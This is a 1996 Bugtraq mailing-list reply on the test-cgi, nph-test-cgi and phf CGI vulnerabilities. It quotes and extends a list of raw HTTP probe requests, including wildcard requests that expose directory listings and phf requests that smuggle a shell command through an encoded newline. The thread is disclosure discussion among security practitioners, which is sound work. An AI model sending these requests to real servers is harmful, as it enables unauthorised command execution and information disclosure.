[3801] in bugtraq
Re: [nph]test-cgi
daemon@ATHENA.MIT.EDU (Laurent FACQ)
Mon Dec 16 12:04:34 1996
Date: Mon, 16 Dec 1996 15:59:05 WET
Reply-To: Laurent FACQ <facq@sreaumur.u-bordeaux.fr>
From: Laurent FACQ <facq@sreaumur.u-bordeaux.fr>
X-To: hobbit@avian.org
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <m0vYREq-000CvYC@knuth.mtsu.edu>; from "*Hobbit*" at Dec 13,
96 12:36 am
*Hobbit* <hobbit@avian.org> writes :
>
> Interesting how many people are suddenly coming out of the woodwork as
> though test-cgi was a new problem.
>
> With minor variants, both scripts are a problem in a couple of areas. Crank
> each of these plus a couple of newlines into your server and see what you get:
>
> GET /cgi-bin/test-cgi?* HTTP/1.0
> GET /cgi-bin/test-cgi?x *
> GET /cgi-bin/nph-test-cgi?* HTTP/1.0
> GET /cgi-bin/nph-test-cgi?x *
>
> not to mention
>
> GET /cgi-bin/phf?Q=x%0apwd
> GET /cgi-bin/phf?Q=x%ffpwd
you can add too :
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *
LF.
--
--
Laurent FACQ - facq@u-bordeaux.fr (05.56.84.65.34) - Reseau REAUMUR / Bordeaux
